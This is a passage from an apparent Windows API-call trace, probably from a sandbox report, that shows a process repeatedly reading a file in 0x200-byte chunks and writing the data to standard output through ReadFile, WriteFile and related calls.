nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.168] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, 
lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.170] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.170] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.170] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] WriteFile (in: hFile=0x50, 
lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.171] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.171] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] GetFileType (hFile=0x50) returned 0x1 [0128.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.172] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.172] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.173] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, 
lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] GetFileType (hFile=0x50) returned 0x1 [0128.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.173] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 
| out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.174] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.174] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] GetFileType (hFile=0x50) returned 0x1 [0128.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.174] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.175] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.175] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.175] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.175] GetFileType (hFile=0x50) returned 0x1 [0128.175] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 
[0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] GetFileType (hFile=0x50) returned 0x1 [0128.176] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.176] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.177] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.177] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, 
lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] GetFileType (hFile=0x50) returned 0x1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] GetFileType (hFile=0x50) returned 0x1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] GetFileType (hFile=0x50) returned 0x1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] GetFileType (hFile=0x50) returned 0x1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.177] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.178] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.178] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.178] GetFileType (hFile=0x50) returned 0x1 [0128.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.206] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.207] GetFileType 
